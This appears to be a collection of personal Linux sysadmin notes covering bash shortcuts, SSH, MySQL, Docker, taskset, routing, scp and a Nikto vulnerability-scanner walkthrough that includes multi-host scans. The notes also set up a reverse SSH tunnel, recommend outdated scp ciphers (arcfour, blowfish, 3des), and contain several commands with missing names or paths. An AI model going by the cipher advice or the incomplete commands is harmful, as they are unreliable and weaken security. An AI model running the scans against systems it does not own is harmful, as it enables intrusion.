Use the following shortcuts to manage running processes.

Ctrl+C: Interrupt (kill) the current foreground process running in the terminal. This sends the SIGINT signal to the process, which is technically just a request—most processes will honor it, but some may ignore it.
Ctrl+Z: Suspend the current foreground process running in bash. This sends the SIGTSTP signal to the process. To return the process to the foreground later, use the fg command (optionally with a job spec, e.g. fg %1).
Ctrl+D: Close the bash shell. This sends an EOF (End-of-file) marker to bash, and bash exits when it receives this marker. This is similar to running the exit command.

Controlling the Screen
The following shortcuts allow you to control what appears on the screen.

Ctrl+L: Clear the screen. This is similar to running the “clear” command.
Ctrl+S: Stop all output to the screen. This is particularly useful when running commands with a lot of long, verbose output, but you don’t want to stop the command itself with Ctrl+C.
Ctrl+Q: Resume output to the screen after stopping it with Ctrl+S.
Moving the Cursor
Use the following shortcuts to quickly move the cursor around the current line while typing a command.

Ctrl+A or Home: Go to the beginning of the line.
Ctrl+E or End: Go to the end of the line.
Alt+B: Go left (back) one word.
Ctrl+B: Go left (back) one character.
Alt+F: Go right (forward) one word.
Ctrl+F: Go right (forward) one character.
Ctrl+XX: Move between the beginning of the line and the current position of the cursor. This allows you to press Ctrl+XX to return to the start of the line, change something, and then press Ctrl+XX to go back to your original cursor position. To use this shortcut, hold the Ctrl key and tap the X key twice.
Deleting Text
Use the following shortcuts to quickly delete characters:

Ctrl+D or Delete: Delete the character under the cursor.
Alt+D: Delete all characters after the cursor on the current line.
Ctrl+H or Backspace: Delete the character before the cursor.
Fixing Typos
These shortcuts allow you to fix typos and undo your key presses.

Alt+T: Swap the current word with the previous word.
Ctrl+T: Swap the last two characters before the cursor with each other. You can use this to quickly fix typos when you type two characters in the wrong order.
Ctrl+_: Undo your last key press. You can repeat this to undo multiple times.
Cutting and Pasting
Bash includes some basic cut-and-paste features.

Ctrl+W: Cut the word before the cursor, adding it to the clipboard.
Ctrl+K: Cut the part of the line after the cursor, adding it to the clipboard.
Ctrl+U: Cut the part of the line before the cursor, adding it to the clipboard.
Ctrl+Y: Paste the last thing you cut from the clipboard. The y here stands for “yank”.
Capitalizing Characters
The bash shell can quickly convert characters to upper or lower case:

Alt+U: Capitalize every character from the cursor to the end of the current word, converting the characters to upper case.
Alt+L: Uncapitalize every character from the cursor to the end of the current word, converting the characters to lower case.
Alt+C: Capitalize the character under the cursor. Your cursor will move to the end of the current word.
Tab Completion
RELATED: Use Tab Completion to Type Commands Faster on Any Operating System

Tab completion is a very useful bash feature. While typing a file, directory, or command name, press Tab and bash will automatically complete what you’re typing, if possible. If not, bash will show you various possible matches and you can continue typing and pressing Tab to finish typing.

Tab: Automatically complete the file, directory, or command you’re typing.
For example, if you have a file named really_long_file_name in /home/chris/ and it’s the only file name starting with “r” in that directory, you can type /home/chris/r, press Tab, and bash will automatically fill in /home/chris/really_long_file_name for you. If you have multiple files or directories starting with “r”, bash will inform you of your possibilities. You can start typing one of them and press “Tab” to continue.

Working With Your Command History
RELATED: How to Use Your Bash History in the Linux or macOS Terminal

You can quickly scroll through your recent commands, which are stored in your user account’s bash history file:

Ctrl+P or Up Arrow: Go to the previous command in the command history. Press the shortcut multiple times to walk back through the history.
Ctrl+N or Down Arrow: Go to the next command in the command history. Press the shortcut multiple times to walk forward through the history.
Alt+R: Revert any changes to a command you’ve pulled from your history if you’ve edited it.
Bash also has a special “recall” mode you can use to search for commands you’ve previously run:

Ctrl+R: Recall the last command matching the characters you provide. Press this shortcut and start typing to search your bash history for a command.
Ctrl+O: Run a command you found with Ctrl+R.
Ctrl+G: Leave history searching mode without running a command.

Auteur : Harlok

2019-04-16 21:56:02

SSH Terminal allocation

The primary difference is the concept of interactivity. It's similar to running commands locally inside of a script, vs. typing them out yourself. It's different in that a remote command must choose a default, and non-interactive is safest. (and usually most honest)

If a PTY is allocated, applications can detect this and know that it's safe to prompt the user for additional input without breaking things. There are many programs that will skip the step of prompting the user for input if there is no terminal present, and that's a good thing. It would cause scripts to hang unnecessarily otherwise.
Your input will be sent to the remote server for the duration of the command. This includes control sequences. While a Ctrl-c break would normally cause a loop on the ssh command to break immediately, your control sequences will instead be sent to the remote server. This results in a need to "hammer" the keystroke to ensure that it arrives when control leaves the ssh command, but before the next ssh command begins.
I would caution against using ssh -t in unattended scripts, such as crons. A non-interactive shell asking a remote command to behave interactively for input is asking for all kinds of trouble.

You can also test for the presence of a terminal in your own shell scripts. To test STDIN with newer versions of bash:

# fd 0 is STDIN
[ -t 0 ]; echo $?
When aliasing ssh to ssh -t, you can expect to get an extra carriage return in your line ends. It may not be visible to you, but it's there; it will show up as ^M when piped to cat -e. You must then expend the additional effort of ensuring that this control code does not get assigned to your variables, particularly if you're going to insert that output into a database.
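The stray carriage return is easy to reproduce without ssh; cat -e makes it visible:

```shell
# A line ending in \r\n looks normal when printed, but cat -e exposes the \r as ^M.
printf 'uptime\r\n' | cat -e   # -> uptime^M$
```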
There is also the risk that programs will assume they can render output that is not friendly for file redirection. Normally if you were to redirect STDOUT to a file, the program would recognize that your STDOUT is not a terminal and omit any color codes. If the STDOUT redirection is from the output of the ssh client and there is a PTY associated with the remote end of the client, the remote programs cannot make such a distinction and you will end up with terminal garbage in your output file. Redirecting output to a file on the remote end of the connection should still work as expected.
Here is the same bash test as earlier, but for STDOUT:

# fd 1 is STDOUT
[ -t 1 ]; echo $?
While it's possible to work around these issues, you're inevitably going to forget to design scripts around them. All of us do at some point. Your team members may also not realize/remember that this alias is in place, which will in turn create problems for you when they write scripts that use your alias.

Aliasing ssh to ssh -t is very much a case where you'll be violating the design principle of least surprise; people will be encountering problems they do not expect and may not understand what is causing them.

SSH escape characters and transfer of binary files
One advantage that hasn’t been mentioned in the other answers is that when operating without a pseudo-terminal, the SSH escape characters such as ~C are not supported; this makes it safe for programs to transfer binary files which may contain these sequences.

Proof of concept
Copy a binary file using a pseudo-terminal:

$ ssh -t anthony@remote_host 'cat /usr/bin/free' > ~/free
Connection to remote_host closed.
Copy a binary file without using a pseudo-terminal:

$ ssh anthony@remote_host 'cat /usr/bin/free' > ~/free2
The two files aren’t the same:

$ diff ~/free*
Binary files /home/anthony/free and /home/anthony/free2 differ
The one which was copied with a pseudo-terminal is corrupted:

$ chmod +x ~/free*
$ ./free
Segmentation fault
while the other isn’t:

$ ./free2
total used free shared buffers cached
Mem: 2065496 1980876 84620 0 48264 1502444
-/+ buffers/cache: 430168 1635328
Swap: 4128760 112 4128648
Transferring files over SSH
This is particularly important for programs such as scp or rsync which use SSH for data transfer. This detailed description of how the SCP protocol works explains how the SCP protocol consists of a mixture of textual protocol messages and binary file data.

OpenSSH helps protects you from yourself
It’s worth noting that even if the -t flag is used, the OpenSSH ssh client will refuse to allocate a pseudo-terminal if it detects that its stdin stream is not a terminal:

$ echo testing | ssh -t anthony@remote_host 'echo $TERM'
Pseudo-terminal will not be allocated because stdin is not a terminal.
You can still force the OpenSSH client to allocate a pseudo-terminal with -tt:

$ echo testing | ssh -tt anthony@remote_host 'echo $TERM'
In either case, it (sensibly) doesn’t care if stdout or stderr are redirected:

$ ssh -t anthony@remote_host 'echo $TERM' >| ssh_output
Connection to remote_host closed.

Auteur : Harlok

2019-04-16 22:03:29

MySQL performance

By Zvonko Biškup

You finished your brand new application, everything is working like a charm. Users are coming and using your web. Everybody is happy.

Then, suddenly, a big burst of users kills your MySQL server and your site is down. What went wrong? How can you prevent it?

Here are some tips on MySQL Performance which will help you and help your database.

In the early stage of development you should be aware of expected number of users coming to your application. If you expect many users, you should think big from the very beginning, plan for replication, scalability and performance.

But if you optimize your SQL code, schema and indexing strategy, maybe you will not need a big environment. You must always think twice, as performance and scalability are not the same.

The EXPLAIN statement can be used either as a way to obtain information about how MySQL executes a SELECT statement or as a synonym for DESCRIBE.

When you precede a SELECT statement with the keyword EXPLAIN, MySQL displays information from the optimizer about the query execution plan. That is, MySQL explains how it would process the SELECT, including information about how tables are joined and in which order. EXPLAIN EXTENDED can be used to provide additional information.

Databases are typically stored on disk (with the exception of some, like MEMORY databases, which are stored in memory). This means that in order for the database to fetch information for you, it must read that information off the disk and turn it into a results set that you can use. Disk I/O is extremely slow, especially in comparison to other forms of data storage.

When your database grows to be large, the read time begins to take longer and longer. Poorly designed databases deal with this problem by allocating more space on the disk than they need. This means that the database occupies space on the disk that is being used inefficiently.

Picking the right data types can help by ensuring that the data we are storing makes the database as small as possible. We do this by selecting only the data types we need.

The reason behind using persistent connections is reducing number of connects which are rather expensive, even though they are much faster with MySQL than with most other databases.

There is some debate on the web on this topic, and the mysqli extension has disabled the persistent connection feature, so I will not write much more about it. The only downside of persistent connections is that with many concurrent connections the max_connections setting could be reached. This is easily changed in the MySQL settings, so I don't think this is a reason to avoid persistent connections.

Persistent connections are particularly useful if you have db server on another machine. Because of the mentioned downside, use them wisely.

The query cache stores the text of a SELECT statement together with the corresponding result that was sent to the client. If an identical statement is received later, the server retrieves the results from the query cache rather than parsing and executing the statement again. The query cache is shared among sessions, so a result set generated by one client can be sent in response to the same query issued by another client.

The query cache can be useful in an environment where you have tables that do not change very often and for which the server receives many identical queries. This is a typical situation for many Web servers that generate many dynamic pages based on database content.

The query cache does not return stale data. When tables are modified, any relevant entries in the query cache are flushed.

How do you find out my MySQL query cache is working or not?
MySQL provides the stats of same just type following command at mysql> prompt:

mysql> show variables like 'query%';

An index on a column can be a great performance gain, but if you use that column inside a function, the index is never used.

Always try to rewrite the query to not use the function with indexed column.


For example, a query that wraps the indexed event_date column in a date function could instead be written as

WHERE event_date >= '2011/03/15' - INTERVAL 7 DAY

and today’s date is generated from PHP. This way, index on column event_date is used and the query can be stored inside Query Cache.
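The same trick can be sketched from the shell (the article generates the date in PHP; the GNU `date -d` flag below is an assumption of this sketch):

```shell
# Compute the cutoff outside SQL so the indexed column is compared to a constant.
cutoff=$(date -d '7 days ago' '+%Y/%m/%d')
echo "SELECT ... WHERE event_date >= '$cutoff'"
```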

SQL code is the foundation for optimizing database performance. Master SQL coding techniques like rewriting subquery SQL statements to use JOINS, eliminating cursors with JOINS and similar.

By writing great SQL code your database performance will be great.

If you specify ON DUPLICATE KEY UPDATE, and a row is inserted that would cause a duplicate value in a UNIQUE index or PRIMARY KEY, an UPDATE of the old row is performed.

INSERT INTO wordcount (word, count)
VALUES ('a_word', 1)
ON DUPLICATE KEY UPDATE count = count + 1;

You are saving one round trip to the server (a SELECT followed by an UPDATE or INSERT), and cleaning your code up by removing the whole "if record exists then update else insert" branch.

If you follow some of these tips, your database will be grateful to you.

Auteur : Harlok

2019-04-16 22:08:50

Init service status

The service --status-all command tries to figure out for every init script in /etc/init.d if it supports a status command (by grepping the script for status).

If it doesn't find that string it will print [ ? ] for that service.

Otherwise it will run /etc/init.d/$application status.
If the return code is 0 it prints [ + ].
If it's not 0 it prints [ - ].

Why does ssh print [ - ] even though it's still running?
ssh is controlled by upstart in Ubuntu (13.10).
Running /etc/init.d/ssh status will produce no output and a return code of 1.
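The mapping described above can be sketched as a small shell function (the function name is made up):

```shell
# service --status-all prints [ + ] for exit code 0, [ - ] otherwise,
# and [ ? ] when the init script has no status command at all.
status_symbol() {
    case "$1" in
        0) echo "[ + ]" ;;
        *) echo "[ - ]" ;;
    esac
}
status_symbol 0   # -> [ + ]
status_symbol 1   # -> [ - ]
```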

Auteur : Harlok

2019-04-16 22:35:21

Docker Commands Reference


Command : Description

$docker attach :Attach local standard input, output, and error streams to a running container
$docker build :Build an image from a Dockerfile
$docker checkpoint :Manage checkpoints
$docker commit :Create a new image from a container’s changes
$docker config :Manage Docker configs
$docker container :Manage containers
$docker cp :Copy files/folders between a container and the local filesystem
$docker create :Create a new container
$docker deploy :Deploy a new stack or update an existing stack
$docker diff :Inspect changes to files or directories on a container’s filesystem
$docker events :Get real time events from the server
$docker exec :Run a command in a running container
$docker export :Export a container’s filesystem as a tar archive
$docker history :Show the history of an image
$docker image :Manage images
$docker images :List images
$docker import :Import the contents from a tarball to create a filesystem image
$docker info :Display system-wide information
$docker inspect :Return low-level information on Docker objects
$docker kill :Kill one or more running containers
$docker load :Load an image from a tar archive or STDIN
$docker login :Log in to a Docker registry
$docker logout :Log out from a Docker registry
$docker logs :Fetch the logs of a container
$docker manifest :Manage Docker image manifests and manifest lists
$docker network :Manage networks
$docker node :Manage Swarm nodes
$docker pause :Pause all processes within one or more containers
$docker plugin :Manage plugins
$docker port :List port mappings or a specific mapping for the container
$docker ps :List containers
$docker pull :Pull an image or a repository from a registry
$docker push :Push an image or a repository to a registry
$docker rename :Rename a container
$docker restart :Restart one or more containers
$docker rm :Remove one or more containers
$docker rmi :Remove one or more images
$docker run :Run a command in a new container
$docker save :Save one or more images to a tar archive (streamed to STDOUT by default)
$docker search :Search the Docker Hub for images
$docker secret :Manage Docker secrets
$docker service :Manage services
$docker stack :Manage Docker stacks
$docker start :Start one or more stopped containers
$docker stats :Display a live stream of container(s) resource usage statistics
$docker stop :Stop one or more running containers
$docker swarm :Manage Swarm
$docker system :Manage Docker
$docker tag :Create a tag TARGET_IMAGE that refers to SOURCE_IMAGE
$docker top :Display the running processes of a container
$docker trust :Manage trust on Docker images
$docker unpause :Unpause all processes within one or more containers
$docker update :Update configuration of one or more containers
$docker version :Show the Docker version information
$docker volume :Manage volumes
$docker wait :Block until one or more containers stop, then print their exit codes

Auteur : Harlok

2019-05-13 16:20:00

Make a debian container with Apache/php

RUN apt-get update && apt-get -y upgrade && DEBIAN_FRONTEND=noninteractive apt-get -y install \
apache2 php7.0 php7.0-mysql libapache2-mod-php7.0 curl lynx-cur

# Enable apache mods.
RUN a2enmod php7.0
RUN a2enmod rewrite

# Update the PHP.ini file, enable tags and quieten logging.
RUN sed -i "s/short_open_tag = Off/short_open_tag = On/" /etc/php/7.0/apache2/php.ini
RUN sed -i "s/error_reporting = .*$/error_reporting = E_ERROR | E_WARNING | E_PARSE/" /etc/php/7.0/apache2/php.ini

# Manually set up the apache environment variables
ENV APACHE_LOG_DIR /var/log/apache2
ENV APACHE_LOCK_DIR /var/lock/apache2

# Expose apache.

# Copy this repo into place.
ADD www_data /var/www/html

# Update the default apache site with the config we created.
ADD apache-config.conf /etc/apache2/sites-enabled/000-default.conf

# By default start up apache in the foreground, override with /bin/bash for interactive use.
CMD /usr/sbin/apache2ctl -D FOREGROUND

Auteur : Harlok

2019-04-16 22:25:24

Nikto

What is Nikto?
It is a web vulnerability scanner written in Perl and released under the GPL. It lets you test the security of your web server's configuration (HTTP options, indexes, potential XSS flaws, SQL injections, etc.).

Use it only on your own servers. The scan is noisy and generates dozens of log lines containing your IP, in the Apache logs or in any IDS. The point is to find the flaws at home, so we can harden our own web servers as well as possible.

Installing the script
It ships by default with the KALI distribution. Here I will install it on my Raspbian box, which hosts an Apache web server.

Nikto v2.1.6 is available on GitHub:

Download the zip and extract it:



cd nikto-master/program

Scanning the web ports (80 and 443)
By default Nikto scans port 80, so let's see instead how to scan HTTPS port 443:

./ -h https://[URL]:443/ -F txt -o ScanResultat.txt

Multi-port scan
./ -h [URL] -p 8080,80,443

Multi-host scan
It is possible to scan a range of web server addresses. Nikto can read from its standard input, so we "feed" it the result of an nmap scan:

nmap -p80 -oG - | ./ -h -

Verbose and debug scan
Add the -D -v options. Reusing the previous example, that gives:

./ -h [URL] -p 8080,80,443 -D -v

Behind a proxy
sudo vim /nikto-master/program/nikto.conf

Specify the proxy:

# Proxy settings -- still must be enabled by -useproxy
PROXYHOST=<proxy ip or URL>
Test the scan with the proxy configured above:

./ -h [URL] -useproxy

Understanding some findings
Let's start from the simple output of the command:

nikto -h http://monserveurWeb

Source :

Auteur : tux

Auteur : Harlok

2019-04-03 10:48:39

Cleaning pacman

I strongly suggest the use of paccache instead of pacman -Sc. There is even a very effective flag for removing selectively the versions of uninstalled packages -u. The flags of paccache I recommend are (as part of paccache v5.0.2):

pacman -S pacman-contrib

-d, --dryrun: perform a dry run, only finding candidate packages
-r, --remove: remove candidate packages
-u, --uninstalled: target uninstalled packages only
-k, --keep : keep "num" of each package in the cache (default: 3)
Example: Check for remaining cache versions of uninstalled packages
paccache -dvuk0

Auteur : Harlok

2019-05-14 15:03:57

Reverse ssh | Linux | cli

1) destination -> source
On the destination host: ssh -R 19999:localhost:22 user@server
Then on the server: ssh user@localhost -p 19999

Auteur : Harlok

2019-04-16 22:03:18

Chrome isolation

Enable Strict Site Isolation in Chrome

Enable Strict Site Isolation via Chrome flags

Open Chrome.
Type chrome://flags in the address bar and hit the Enter key.
Press Ctrl+F and look for Strict Site Isolation.
Click Enable to turn the feature ON.
As you click Enable, a Relaunch Now button will appear.

Relaunch Chrome to make the changes take effect. The browser will relaunch with all your tabs open.

Enable Strict Site Isolation by changing the Target

Right-click the Chrome icon and select Properties.

Under the Shortcut tab, in the 'Target' field, append --site-per-process after the closing quotation mark, separated by a space.

So the target should now appear as:
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --site-per-process

Auteur : Harlok

2018-01-09 17:47:51

bridge up | linux | cli

sudo ip link add name br0 type bridge
sudo ip link set enp8s0f1 master br0
sudo ip link set br0 up
ifconfig enp8s0f1
dhclient br0

Auteur : Harlok

2019-04-16 22:06:56

Mining | cli | Linux

As root or with sudo:
sysctl -w vm.nr_hugepages=128

Auteur : Harlok

2019-05-04 21:57:15

SSH KEY | cli | Linux

ssh-keygen -t rsa
The best algorithm is ed25519: ssh-keygen -t ed25519
Enter file in which to save the key (/home/exemple/.ssh/
ssh-copy-id user@
cat ~/.ssh/ | ssh user@ "mkdir -p ~/.ssh && cat >> ~/.ssh/authorized_keys"
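A non-interactive sketch of the key-generation step (the temp file path is purely for illustration):

```shell
# Generate an ed25519 key pair without prompts, into a temp path
keyfile=$(mktemp -u)                     # unused temp filename
ssh-keygen -t ed25519 -N "" -f "$keyfile" -q
cat "$keyfile.pub"                       # this line is what ends up in authorized_keys
```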

Auteur : Harlok

2019-04-16 22:03:05

core affinity | cli | linux

View the CPU Affinity of a Running Process

To retrieve the CPU affinity information of a process, use the following format. taskset returns the current CPU affinity in a hexadecimal bitmask format.

taskset -p

For example, to check the CPU affinity of a process with PID 2915:
$ taskset -p 2915

pid 2915's current affinity mask: ff

In this example, the returned affinity (represented in a hexadecimal bitmask) corresponds to "11111111" in binary format, which means the process can run on any of eight different CPU cores (from 0 to 7).

The lowest bit in a hexadecimal bitmask corresponds to core ID 0, the second lowest bit from the right to core ID 1, the third lowest bit to core ID 2, etc. So for example, a CPU affinity "0x11" represents CPU core 0 and 4.
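That bit-to-core mapping can be sketched as a small shell helper (hypothetical name mask_to_cores):

```shell
# Expand a hexadecimal affinity mask into the core IDs it selects:
# bit 0 -> core 0, bit 1 -> core 1, and so on.
mask_to_cores() {
  local mask=$((16#${1#0x})) core=0 cores=""
  while [ "$mask" -ne 0 ]; do
    [ $((mask & 1)) -eq 1 ] && cores="$cores $core"
    mask=$((mask >> 1))
    core=$((core + 1))
  done
  echo "${cores# }"
}
mask_to_cores 0x11   # prints: 0 4
mask_to_cores ff     # prints: 0 1 2 3 4 5 6 7
```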

taskset can show CPU affinity as a list of processors instead of a bitmask, which is easier to read. To use this format, run taskset with "-c" option. For example:
$ taskset -cp 2915

pid 2915's current affinity list: 0-7

Pin a Running Process to Particular CPU Core(s)

Using taskset, you can "pin" (or assign) a running process to particular CPU core(s). For that, use the following format.
$ taskset -p
$ taskset -cp

For example, to assign a process to CPU core 0 and 4, do the following.
$ taskset -p 0x11 9030

pid 9030's current affinity mask: ff
pid 9030's new affinity mask: 11

Or equivalently:
$ taskset -cp 0,4 9030

With "-c" option, you can specify a list of numeric CPU core IDs separated by commas, or even include ranges (e.g., 0,2,5,6-10).

Note that in order to be able to change the CPU affinity of a process, a user must have CAP_SYS_NICE capability. Any user can view the affinity mask of a process.
Launch a Program on Specific CPU Cores

taskset also allows you to launch a new program as pinned to specific CPU cores. For that, use the following format.


For example, to launch vlc program on a CPU core 0, use the following command.
$ taskset 0x1 vlc

Dedicate a Whole CPU Core to a Particular Program

While taskset allows a particular program to be assigned to certain CPUs, that does not mean that no other programs or processes will be scheduled on those CPUs. If you want to prevent this and dedicate a whole CPU core to a particular program, you can use "isolcpus" kernel parameter, which allows you to reserve the CPU core during boot.

Add the kernel parameter "isolcpus=" to the boot loader during boot or GRUB configuration file. Then the Linux scheduler will not schedule any regular process on the reserved CPU core(s), unless specifically requested with taskset. For example, to reserve CPU cores 0 and 1, add "isolcpus=0,1" kernel parameter. Upon boot, then use taskset to safely assign the reserved CPU cores to your program.

Auteur : Harlok

2018-01-09 17:45:48

Macvtap | linux

Macvtap is a new device driver meant to simplify virtualized bridged networking. It replaces the combination of the tun/tap and bridge drivers with a single module based on the macvlan device driver. A macvtap endpoint is a character device that largely follows the tun/tap ioctl interface and can be used directly by kvm/qemu and other hypervisors that support the tun/tap interface. The endpoint extends an existing network interface, the lower device, and has its own mac address on the same ethernet segment. Typically, this is used to make both the guest and the host show up directly on the switch that the host is connected to.
VEPA, Bridge and private mode

Like macvlan, any macvtap device can be in one of three modes, defining the communication between macvtap endpoints on a single lower device:

Virtual Ethernet Port Aggregator (VEPA), the default mode: data from one endpoint to another endpoint on the same lower device gets sent down the lower device to external switch. If that switch supports the hairpin mode, the frames get sent back to the lower device and from there to the destination endpoint.

Most switches today do not support hairpin mode, so the two endpoints are not able to exchange ethernet frames, although they might still be able to communicate using a tcp/ip router. A linux host used as the adjacent bridge can be put into hairpin mode by writing to /sys/class/net/dev/brif/port/hairpin_mode. This mode is particularly interesting if you want to manage the virtual machine networking at the switch level. A switch that is aware of the VEPA guests can enforce filtering and bandwidth limits per MAC address without the Linux host knowing about it.

Bridge, connecting all endpoints directly to each other. Two endpoints that are both in bridge mode can exchange frames directly, without the round trip through the external bridge. This is the most useful mode for setups with classic switches, and when inter-guest communication is performance critical.

For completeness, a private mode exists that behaves like a VEPA mode endpoint in the absence of a hairpin aware switch. Even when the switch is in hairpin mode, a private endpoint can never communicate to any other endpoint on the same lowerdev.

Setting up macvtap

A macvtap interface is created and configured using the ip link command from iproute2, in the same way as we configure macvlan or veth interfaces.


$ ip link add link eth1 name macvtap0 type macvtap
$ ip link set macvtap0 address 1a:46:0b:ca:bc:7b up
$ ip link show macvtap0
12: macvtap0@eth1: mtu 1500 qdisc noqueue state UNKNOWN
link/ether 1a:46:0b:ca:bc:7b brd ff:ff:ff:ff:ff:ff

At the same time a character device gets created by udev. Unless configured otherwise, udev names this device /dev/tapn, with n corresponding to the network interface index of the new macvtap endpoint, in the above example '12'. Unlike tun/tap, the character device only represents a single network interface, and we can give the ownership to a user or group that we want to be able to use the new tap. Configuring the mac address of the endpoint is important, because this address is used on the external network; the guest is not able to spoof or change that address and has to be configured with the same address.
Qemu on macvtap

Qemu as of 0.12 does not have direct support for macvtap, so we have to (ab)use the tun/tap configuration interface. To start a guest on the interface from the above example, we need to pass the device node as an open file descriptor to qemu and tell it about the mac address. The scripts normally used for bridge configuration must be disabled. A bash redirect can be used to open the character device in read/write mode and pass it as file descriptor 3.

qemu -net nic,model=virtio,addr=1a:46:0b:ca:bc:7b -net tap,fd=3 3<>/dev/tap11

Auteur : Harlok

2019-04-16 22:07:55

Route basic reference, nullrouting, gateway, bridge | Linux | Cli

Print kernel IP routing table :
Add a default gateway :
route add default gw
Kernel IP routing cache :
route -Cn

3 methods to Reject a host (nullroute):
route add -host reject
route add gw lo
ip route add blackhole from

3 methods to Reject a network (nullroute):
route add -net netmask reject
route add -net gw lo
ip route add blackhole

Add a route for a network :
ip route add via

Show the routing table :
ip route show

Adding a bridge :
ip link add name bridge_name type bridge
Set up :
ip link set bridge_name up
Set eth0 as master :
ip link set eth0 master bridge_name
Unset eth0 as master :
ip link set eth0 nomaster

Auteur : Harlok

2019-05-13 16:55:26

SCP | cli | Linux

Server to client
scp -P port user@server:/path/to/remote/file ./
Client to server

scp -P port /path/to/some/file user@machine:/path/to/location

Paths: you must have read or write rights on them.


Copy one single local file to a remote destination

scp /path/to/source-file user@host:/path/to/destination-folder/

So, if you want to copy the file /home/user/table.csv to a remote host named and place it in jane's home folder, use this command.

scp /home/user/table.csv

Copy one single file from a remote server to your current local server

scp user@host:/path/to/source-file /path/to/destination-folder

Let's say now you want to copy the same file from jane's home folder in to your local home folder.

scp /home/user/

Copy one single file from a remote server to another remote server

With scp you can copy files between remote servers from a third server without the need to ssh into any of them; all the heavy lifting will be done by scp itself.

scp user1@server1:/path/to/file user2@server2:/path/to/folder/

Let's say now you want to copy the same table file from jane's home folder to pete's home folder in another remote machine.


Copy one single file from a remote host to the same remote host in another location


This time, you will be copying from one host to the same host, but on different folders under the control of different users.

Copy multiple files with one command

You can copy multiple files at once without having to copy all the files in a folder, or copy multiple files from different folders putting them in a space separated list.

scp file1.txt file2.txt file3.txt

If the files are in different folders, just specify the complete path.

scp /path/to/file1.txt /path/to/file2.txt /path/to/file3.txt

Copy all files of a specific type

scp /path/to/folder/*.ext user@server:/path/to/folder/

This will copy all files of a given extension to the remote server. For instance, you want to copy all your text files (txt extension) to a new folder.

scp /home/user/*.txt

You can make use of wildcards in any way you want.

Copy all files in a folder to a remote server

scp /path/to/folder/* user@server:/path/to/folder/

This will copy all files inside local folder to the remote folder, let's see an example.

scp /home/user/html/*

All files in the local html folder will be copied to the backup folder in

Copy all files in a folder recursively to a remote server

scp -r /home/user/html/*

Same as the previous example, but this time it will copy all contents recursively.

Copy a folder and all its contents to a remote server

scp -r /path/to/source-folder user@server:/path/to/destination-folder/

This time the folder itself is copied with all its contents and not only the contents. One more time we'll use an example.

scp -r /home/user/html

This will result in having in the remote server this: /home/jane/backup/html/.... The whole html folder and its contents have been copied to the remote server recursively.

We have seen the basic uses of scp; now we will see some special uses and tricks of this great command.

Increase Speed

scp uses AES-128 to encrypt data, which is very secure, but also a little bit slow. If you need more speed and still want security, you can use Blowfish or RC4.

To increase scp speed, change the cipher from the default AES-128 to Blowfish:

scp -c blowfish user@server:/home/user/file .

Or use RC4 which seems to be the fastest

scp -c arcfour user@server:/home/user/file .

This last one is not very secure, and it should not be used if security is really an issue for you.

Increase Security

If security is what you want, you can increase it, though you will lose some speed.

scp -c 3des user@server:/home/user/file .

Limit Bandwidth

You may limit the bandwidth used by scp command

scp -l limit username@server:/home/username/* .

Where limit is specified in Kbit/s. So, for example, if you want to limit speed to 50 Kbit/s:

scp -l50 user@server:/path/to/file /path/to/folder

Save Bandwidth

You can save bandwidth by enabling compression; let's see our example with compression.

scp -C user@server:/path/to/file /path/to/folder

Use IPv4 or IPv6

If you want to force the use of either IPv4 or IPv6 use any of these ones.

scp -4 user@server:/path/to/file /path/to/folder

The above one is for IPv4, and below for IPv6.

scp -6 user@server:/path/to/file /path/to/folder

Specify a port

If the remote server does not have ssh listening on the default port 22, you can make scp use the port where the remote server is listening:

scp -P [port] [user]@[server]:[path/to/]file [/path/to/]file

Using the capital letter P you can make scp use a port other than 22, which is the default for ssh. Let's say your remote server is listening on 2222.

scp -P 2222 user@server:/home/jane/file /home/jane/

Use verbose output

If you want to see what is happening under the hood, use the -v parameter for a verbose output

scp -v user@server:/home/jane/file /home/jane/


If you are working on a Windows powered computer, you can still enjoy scp in various ways. Of course, if you are a "*nix guy" you will prefer the command line, but GUI tools are also available.

pscp is a shell command that works in the Windows shell almost the same way that scp works on Linux or Mac OS X. You first need to download it from this page; here is the direct link.

Once downloaded you can invoke it from the Windows command line. Go to the Start menu, click on Run, then type cmd


And press ENTER, if you are on Windows 8.x hit the Windows/Super key and click on the magnifier lens, type cmd and hit ENTER.

Once in the command line, be sure to be in the directory where the pscp file was downloaded, or add that folder to your PATH. Let's suppose the folder is your Downloads folder; run this command:

SET PATH=C:\Users\Guillermo\Downloads;%PATH%

You will have to set that command every time you open a new command shell, or you can add the path permanently, how to do that is out of the scope of this article.

Below are the options of the command, you will see that the options available let you do almost everything.

PuTTY Secure Copy client
Release 0.63
Usage: pscp [options] [user@]host:source target
pscp [options] source [source...] [user@]host:target
pscp [options] -ls [user@]host:filespec
-V print version information and exit
-pgpfp print PGP key fingerprints and exit
-p preserve file attributes
-q quiet, don't show statistics
-r copy directories recursively
-v show verbose messages
-load sessname Load settings from saved session
-P port connect to specified port
-l user connect with specified username
-pw passw login with specified password
-1 -2 force use of particular SSH protocol version
-4 -6 force use of IPv4 or IPv6
-C enable compression
-i key private key file for authentication
-noagent disable use of Pageant
-agent enable use of Pageant
-batch disable all interactive prompts
-unsafe allow server-side wildcards (DANGEROUS)
-sftp force use of SFTP protocol
-scp force use of SCP protocol

Copy files from Windows to Linux

You can use the pscp command to copy files from Windows to Linux:

pscp c:\path\to\file user@remote-server:/path/to/remote-folder

Copy files from Linux to Windows

You can also copy files from Linux to Windows: using pscp from the Windows computer you can "pull" the files from the Linux, Mac OS X or *BSD server.

pscp user@remote-server:/path/to/remote-file c:\path\to\local-folder\

Specify protocol

You can specify the protocol that the scp command for Windows will use at connection time.

-scp : this will force pscp to use the scp protocol
-sftp : this will force pscp to use the sftp protocol, which is a newer protocol than scp

Auteur : Harlok

2019-04-16 22:02:52

Laptop Lid tuning | linux | cli

Sometimes you will have problems with lid open close on laptop

Edit /etc/systemd/logind.conf and make sure you have:

HandleLidSwitch=ignore

You can replace ignore with suspend or poweroff,
which will make it ignore the lid being closed. (You may need to also undo the other changes you've made.)

Then, you'll want to reload logind.conf to make your changes go into effect (thanks to Ehtesh Choudhury for pointing this out in the comments):

systemctl restart systemd-logind
Full details over at the archlinux Wiki.

The man page for logind.conf also has the relevant information,


Controls whether logind shall handle the system power and sleep
keys and the lid switch to trigger actions such as system power-off
or suspend. Can be one of ignore, poweroff, reboot, halt, kexec,
suspend, hibernate, hybrid-sleep and lock. If ignore logind will
never handle these keys. If lock all running sessions will be
screen locked. Otherwise the specified action will be taken in the
respective event. Only input devices with the power-switch udev tag
will be watched for key/lid switch events. HandlePowerKey=
